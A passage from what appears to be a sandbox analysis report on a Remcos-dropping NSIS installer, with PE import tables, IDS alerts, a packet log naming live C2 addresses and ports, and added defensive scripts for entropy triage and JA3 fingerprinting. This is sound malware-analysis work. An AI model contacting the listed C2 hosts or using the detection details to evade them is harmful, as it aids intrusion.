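    (the NSIS '.ndata' section in the report: MD5 of the empty string,
    entropy 0.0) and says nothing on its own. Roughly 7.2 bits and up is what
    compressed or encrypted payloads show (the 7.80 of the installer, the 7.67
    of the 347597-byte dropped blob); native x86 code tends to sit around
    6.0-6.6 (.text here: 6.42); strings and tables are lower; a value near 1,
    as in the 1.25-entropy dropped file, means the buffer is mostly one value.
    """
    if raw_size == 0:
        return "empty"
    if entropy >= 7.2:
        return "packed/encrypted"
    if entropy >= 5.8:
        return "code-like"
    if entropy >= 2.0:
        return "plain data"
    return "sparse/mostly one value"


def section_report(sections: Dict[str, bytes]) -> List[Tuple[str, float, str]]:
    """Return (name, entropy rounded to 3 places, verdict) per section, in order."""
    rows = []
    for name, blob in sections.items():
        e = shannon_entropy(blob)
        rows.append((name, round(e, 3), classify(e, len(blob))))
    return rows


# Constructed stand-ins with known entropies (hypothetical section contents).
SAMPLE_SECTIONS = {
    ".text": bytes(range(64)) * 64,                                # 64 equiprobable values -> exactly 6.0
    ".rdata": b"This program cannot be run in DOS mode." * 32,     # ASCII text, about 4 bits
    ".ndata": b"",                                                 # uninitialised, raw size 0 (NSIS)
    ".rsrc": b"\x00" * 2048 + b"\x01" * 64,                        # padded bitmap-like buffer, ~0.2 bits
    "overlay": bytes(range(256)) * 16,                             # every byte value equally often -> 8.0
}

if __name__ == "__main__":
    for name, entropy, verdict in section_report(SAMPLE_SECTIONS):
        print(f"{name:<8} {entropy:6.3f}  {verdict}")
```

Run it against real sections by reading each section's raw bytes (file offset PointerToRawData, length SizeOfRawData) into the dictionary; the verdicts are a starting point for triage, not a classifier, and a packed section flagged "packed/encrypted" is exactly where the unpacked payload of an installer like this one lives.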
                                                                           Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                           RT_ICON | 0x62208 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.1999585945818053
                                                                           RT_DIALOG | 0x72a30 | 0x100 | data | English | United States | 0.5234375
                                                                           RT_DIALOG | 0x72b30 | 0x11c | data | English | United States | 0.6056338028169014
                                                                           RT_DIALOG | 0x72c50 | 0xc4 | data | English | United States | 0.5918367346938775
                                                                           RT_DIALOG | 0x72d18 | 0x60 | data | English | United States | 0.7291666666666666
                                                                           RT_GROUP_ICON | 0x72d78 | 0x14 | data | English | United States | 1.15
                                                                           RT_VERSION | 0x72d90 | 0x268 | MS Windows COFF Motorola 68000 object file | English | United States | 0.5048701298701299
                                                                           RT_MANIFEST | 0x72ff8 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
                                                                           DLL | Import
                                                                           KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                           USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                           GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                           SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                           ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                           COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                           ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                           Language of compilation system | Country where language is spoken
                                                                           English | United States
                                                                           Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                           2024-10-08T00:40:23.505863+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.10 | 49980 | 185.26.107.57 | 80 | TCP
                                                                           2024-10-08T00:40:26.595153+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.10 | 49982 | 107.173.4.16 | 2404 | TCP
                                                                           2024-10-08T00:40:27.766991+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.10 | 49984 | 107.173.4.16 | 2404 | TCP
                                                                           2024-10-08T00:40:27.786302+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.10 | 49983 | 178.237.33.50 | 80 | TCP
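Two of the alerts above fire on SID 2036594, a JA3 rule: the IDS did not decrypt the C2 session to 107.173.4.16:2404, it matched the MD5 fingerprint of the client's TLS ClientHello against a value known for the Remcos client. The script below is an added example, not Joe Sandbox or Emerging Threats code: it builds a ClientHello and derives its JA3 string and hash the way such a rule's fingerprint is computed, including the GREASE values a fingerprint has to drop. The ClientHello is constructed for the demonstration; it is not a capture of Remcos traffic, and its hash is not the value the rule carries, which this page does not print.

```python
"""JA3 fingerprint of a TLS ClientHello, the feature an "ET JA3 Hash" rule keys on.

Added example, not Joe Sandbox or Emerging Threats code. JA3 is the MD5 of
"SSLVersion,Ciphers,Extensions,EllipticCurves,PointFormats": each list in
ClientHello order, values in decimal joined by "-", GREASE values omitted.
The ClientHello built here is constructed for the demonstration; it is not
Remcos traffic and its hash is not the one SID 2036594 matches.
"""
import hashlib
import struct
from typing import List, Sequence, Tuple

# RFC 8701 GREASE values (0x0a0a, 0x1a1a, ... 0xfafa); browsers rotate them per
# connection, so a fingerprint that kept them would never be stable.
GREASE = {(v << 8) | v for v in range(0x0A, 0x100, 0x10)}


def _u16s(values: Sequence[int]) -> bytes:
    return b"".join(struct.pack(">H", v) for v in values)


def build_client_hello(version: int, ciphers: Sequence[int], groups: Sequence[int],
                       point_formats: Sequence[int],
                       extra_ext: Sequence[Tuple[int, bytes]] = ()) -> bytes:
    """Serialise a minimal TLS record carrying a ClientHello.

    Extensions go out as supported_groups (10), ec_point_formats (11), then
    the given (type, body) pairs; bodies of the extras are not interpreted.
    """
    exts = [(10, struct.pack(">H", 2 * len(groups)) + _u16s(groups)),
            (11, bytes([len(point_formats)]) + bytes(point_formats))]
    exts.extend(extra_ext)
    ext_bytes = b"".join(struct.pack(">HH", t, len(b)) + b for t, b in exts)
    body = (struct.pack(">H", version)
            + b"\x11" * 32                                        # client random (fixed, constructed)
            + b"\x00"                                             # session id length 0
            + struct.pack(">H", 2 * len(ciphers)) + _u16s(ciphers)
            + b"\x01\x00"                                         # one compression method: null
            + struct.pack(">H", len(ext_bytes)) + ext_bytes)
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body     # HandshakeType client_hello
    return b"\x16\x03\x01" + struct.pack(">H", len(handshake)) + handshake


def ja3_string(record: bytes) -> str:
    """Parse a ClientHello record into the JA3 text form."""
    if record[0] != 0x16 or record[5] != 0x01:
        raise ValueError("not a TLS handshake record carrying a ClientHello")
    p = 9                                    # 5-byte record header + 4-byte handshake header
    version = struct.unpack(">H", record[p:p + 2])[0]
    p += 2 + 32                              # version, then the 32-byte random
    p += 1 + record[p]                       # session id
    cs_len = struct.unpack(">H", record[p:p + 2])[0]
    p += 2
    ciphers = [c for c in struct.unpack(">%dH" % (cs_len // 2), record[p:p + cs_len])
               if c not in GREASE]
    p += cs_len
    p += 1 + record[p]                       # compression methods
    ext_types: List[int] = []
    groups: List[int] = []
    formats: List[int] = []
    if p < len(record):                      # the extensions block is optional
        end = p + 2 + struct.unpack(">H", record[p:p + 2])[0]
        p += 2
        while p < end:
            etype, elen = struct.unpack(">HH", record[p:p + 4])
            body = record[p + 4:p + 4 + elen]
            p += 4 + elen
            if etype in GREASE:
                continue
            ext_types.append(etype)
            if etype == 10:                  # supported_groups -> EllipticCurves field
                n = struct.unpack(">H", body[:2])[0] // 2
                groups = [g for g in struct.unpack(">%dH" % n, body[2:2 + 2 * n])
                          if g not in GREASE]
            elif etype == 11:                # ec_point_formats -> PointFormats field
                formats = list(body[1:1 + body[0]])
    lists = [ciphers, ext_types, groups, formats]
    return ",".join([str(version)] + ["-".join(str(v) for v in lst) for lst in lists])


def ja3_hash(record: bytes) -> str:
    return hashlib.md5(ja3_string(record).encode("ascii")).hexdigest()


# Constructed ClientHello: TLS 1.2 version field, a GREASE cipher and a GREASE
# extension the fingerprint must drop, two TLS 1.3 suites and one ECDHE suite.
SAMPLE_HELLO = build_client_hello(
    version=0x0303,
    ciphers=[0x1A1A, 0x1301, 0x1302, 0xC02B],
    groups=[0x2A2A, 0x001D, 0x0017],
    point_formats=[0],
    extra_ext=[(0x3A3A, b""), (23, b""), (0, b"")],   # GREASE, extended_master_secret, SNI
)

if __name__ == "__main__":
    print(ja3_string(SAMPLE_HELLO))          # 771,4865-4866-49195,10-11-23-0,29-23,0
    print(ja3_hash(SAMPLE_HELLO))
```

The string form is what to keep in case notes: two samples with the same hash share the whole string, but a near miss (one cipher reordered, one extension added by a newer build) is only visible in the string. That also bounds what the rule proves: the alert identifies a TLS client implementation with the Remcos fingerprint, not the decrypted C2 protocol, which is why the report backs it with the memory-extracted configuration.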
                                                                           Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                           Oct 8, 2024 00:40:22.817318916 CEST | 49980 | 80 | 192.168.2.10 | 185.26.107.57
                                                                           Oct 8, 2024 00:40:22.823587894 CEST | 80 | 49980 | 185.26.107.57 | 192.168.2.10
                                                                           Oct 8, 2024 00:40:22.823692083 CEST | 49980 | 80 | 192.168.2.10 | 185.26.107.57
                                                                           Oct 8, 2024 00:40:22.824076891 CEST | 49980 | 80 | 192.168.2.10 | 185.26.107.57
                                                                           Oct 8, 2024 00:40:22.830208063 CEST | 80 | 49980 | 185.26.107.57 | 192.168.2.10
                                                                           Oct 8, 2024 00:40:23.505775928 CEST | 80 | 49980 | 185.26.107.57 | 192.168.2.10
                                                                           Oct 8, 2024 00:40:23.505862951 CEST | 49980 | 80 | 192.168.2.10 | 185.26.107.57
                                                                           Oct 8, 2024 00:40:23.506007910 CEST | 49980 | 80 | 192.168.2.10 | 185.26.107.57
                                                                           Oct 8, 2024 00:40:23.506279945 CEST | 80 | 49980 | 185.26.107.57 | 192.168.2.10
                                                                           Oct 8, 2024 00:40:23.506386042 CEST | 49980 | 80 | 192.168.2.10 | 185.26.107.57
                                                                           Oct 8, 2024 00:40:23.511742115 CEST | 49981 | 443 | 192.168.2.10 | 185.26.107.57
                                                                           Oct 8, 2024 00:40:23.511801004 CEST | 443 | 49981 | 185.26.107.57 | 192.168.2.10
                                                                           Oct 8, 2024 00:40:23.511869907 CEST | 49981 | 443 | 192.168.2.10 | 185.26.107.57
                                                                           Oct 8, 2024 00:40:23.512597084 CEST | 80 | 49980 | 185.26.107.57 | 192.168.2.10
                                                                           Oct 8, 2024 00:40:23.523231983 CEST | 49981 | 443 | 192.168.2.10 | 185.26.107.57
                                                                           Oct 8, 2024 00:40:23.523258924 CEST | 443 | 49981 | 185.26.107.57 | 192.168.2.10
                                                                           Oct 8, 2024 00:40:24.222280979 CEST | 443 | 49981 | 185.26.107.57 | 192.168.2.10
                                                                           Oct 8, 2024 00:40:24.222428083 CEST | 49981 | 443 | 192.168.2.10 | 185.26.107.57
                                                                           Oct 8, 2024 00:40:24.271641016 CEST | 49981 | 443 | 192.168.2.10 | 185.26.107.57
                                                                           Oct 8, 2024 00:40:24.271668911 CEST | 443 | 49981 | 185.26.107.57 | 192.168.2.10
                                                                           Oct 8, 2024 00:40:24.271970034 CEST | 443 | 49981 | 185.26.107.57 | 192.168.2.10
                                                                           Oct 8, 2024 00:40:24.272033930 CEST | 49981 | 443 | 192.168.2.10 | 185.26.107.57
                                                                           Oct 8, 2024 00:40:24.274279118 CEST | 49981 | 443 | 192.168.2.10 | 185.26.107.57
                                                                           Oct 8, 2024 00:40:24.319394112 CEST | 443 | 49981 | 185.26.107.57 | 192.168.2.10
                                                                           Oct 8, 2024 00:40:24.594746113 CEST | 443 | 49981 | 185.26.107.57 | 192.168.2.10
                                                                           Oct 8, 2024 00:40:24.594774008 CEST | 443 | 49981 | 185.26.107.57 | 192.168.2.10
                                                                           Oct 8, 2024 00:40:24.594789982 CEST | 443 | 49981 | 185.26.107.57 | 192.168.2.10
                                                                           Oct 8, 2024 00:40:24.594891071 CEST | 49981 | 443 | 192.168.2.10 | 185.26.107.57
                                                                           Oct 8, 2024 00:40:24.594918013 CEST | 443 | 49981 | 185.26.107.57 | 192.168.2.10
                                                                           Oct 8, 2024 00:40:24.594973087 CEST | 49981 | 443 | 192.168.2.10 | 185.26.107.57
                                                                           Oct 8, 2024 00:40:24.596997023 CEST | 443 | 49981 | 185.26.107.57 | 192.168.2.10
                                                                           Oct 8, 2024 00:40:24.597022057 CEST | 443 | 49981 | 185.26.107.57 | 192.168.2.10
                                                                           Oct 8, 2024 00:40:24.597060919 CEST | 49981 | 443 | 192.168.2.10 | 185.26.107.57
                                                                           Oct 8, 2024 00:40:24.597069025 CEST | 443 | 49981 | 185.26.107.57 | 192.168.2.10
                                                                           Oct 8, 2024 00:40:24.597079992 CEST | 49981 | 443 | 192.168.2.10 | 185.26.107.57
                                                                           Oct 8, 2024 00:40:24.597105026 CEST | 49981 | 443 | 192.168.2.10 | 185.26.107.57
                                                                           Oct 8, 2024 00:40:24.697413921 CEST | 443 | 49981 | 185.26.107.57 | 192.168.2.10
                                                                           Oct 8, 2024 00:40:24.697443008 CEST | 443 | 49981 | 185.26.107.57 | 192.168.2.10
                                                                           Oct 8, 2024 00:40:24.697493076 CEST | 49981 | 443 | 192.168.2.10 | 185.26.107.57
                                                                           Oct 8, 2024 00:40:24.697511911 CEST | 443 | 49981 | 185.26.107.57 | 192.168.2.10
                                                                           Oct 8, 2024 00:40:24.697523117 CEST | 49981 | 443 | 192.168.2.10 | 185.26.107.57
                                                                           Oct 8, 2024 00:40:24.697544098 CEST | 49981 | 443 | 192.168.2.10 | 185.26.107.57
                                                                           Oct 8, 2024 00:40:24.699363947 CEST | 443 | 49981 | 185.26.107.57 | 192.168.2.10
                                                                           Oct 8, 2024 00:40:24.699382067 CEST | 443 | 49981 | 185.26.107.57 | 192.168.2.10
                                                                           Oct 8, 2024 00:40:24.699445963 CEST | 49981 | 443 | 192.168.2.10 | 185.26.107.57
                                                                           Oct 8, 2024 00:40:24.699455976 CEST | 443 | 49981 | 185.26.107.57 | 192.168.2.10
                                                                           Oct 8, 2024 00:40:24.699479103 CEST | 49981 | 443 | 192.168.2.10 | 185.26.107.57
                                                                           Oct 8, 2024 00:40:24.699498892 CEST | 49981 | 443 | 192.168.2.10 | 185.26.107.57
                                                                           Oct 8, 2024 00:40:24.702244043 CEST | 443 | 49981 | 185.26.107.57 | 192.168.2.10
                                                                           Oct 8, 2024 00:40:24.702271938 CEST | 443 | 49981 | 185.26.107.57 | 192.168.2.10
                                                                           Oct 8, 2024 00:40:24.702332973 CEST | 49981 | 443 | 192.168.2.10 | 185.26.107.57
                                                                           Oct 8, 2024 00:40:24.702342987 CEST | 443 | 49981 | 185.26.107.57 | 192.168.2.10
                                                                           Oct 8, 2024 00:40:24.702369928 CEST | 49981 | 443 | 192.168.2.10 | 185.26.107.57
                                                                           Oct 8, 2024 00:40:24.702384949 CEST | 49981 | 443 | 192.168.2.10 | 185.26.107.57
                                                                           Oct 8, 2024 00:40:24.995440960 CEST | 443 | 49981 | 185.26.107.57 | 192.168.2.10
                                                                           Oct 8, 2024 00:40:24.995467901 CEST | 443 | 49981 | 185.26.107.57 | 192.168.2.10
                                                                           Oct 8, 2024 00:40:24.995614052 CEST | 49981 | 443 | 192.168.2.10 | 185.26.107.57
                                                                          Oct 8, 2024 00:40:24.995636940 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:24.995932102 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:24.995954990 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:24.995981932 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:24.996001959 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:24.996011972 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:24.996033907 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:24.996457100 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:24.996473074 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:24.996514082 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:24.996520996 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:24.996567965 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:24.996584892 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:24.996843100 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:24.996859074 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:24.996897936 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:24.996905088 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:24.996937990 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:24.996952057 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.003876925 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.003895998 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.003937960 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.003948927 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.003987074 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.004908085 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.004928112 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.004956007 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.004961967 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.004976988 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.004995108 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.006997108 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.007015944 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.007046938 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.007052898 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.007080078 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.007095098 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.008162022 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.008181095 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.008224964 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.008233070 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.011059046 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.011080027 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.011138916 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.011149883 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.011174917 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.011200905 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.014386892 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.014405012 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.014457941 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.014467955 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.015547991 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.016319990 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.016340017 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.016366959 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.016374111 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.016391039 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.016407967 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.016741037 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.016757011 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.016782999 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.016789913 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.016813040 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.016825914 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.017909050 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.017930031 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.017959118 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.017965078 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.017995119 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.019649029 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.019670963 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.019697905 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.019704103 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.019727945 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.019742966 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.022291899 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.022310019 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.022373915 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.022381067 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.023751020 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.023777008 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.023821115 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.023830891 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.023853064 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.023876905 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.028044939 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.028067112 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.028147936 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.028157949 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.028178930 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.028193951 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.028661966 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.028680086 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.028713942 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.028721094 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.028740883 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.028755903 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.030312061 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.030356884 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.030369043 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.030389071 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.030395985 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.030414104 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.030428886 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.031177044 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.031220913 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.031230927 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.031244993 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.031261921 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.031276941 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.031629086 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.031673908 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.031682968 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.031712055 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.031725883 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.034189939 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.041335106 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.041377068 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.041613102 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.041623116 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.041657925 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.042129040 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.042192936 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.042217016 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.042268991 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.281614065 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.281686068 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.281775951 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.281794071 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.281825066 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.281845093 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.282128096 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.282174110 CEST44349981185.26.107.57192.168.2.10
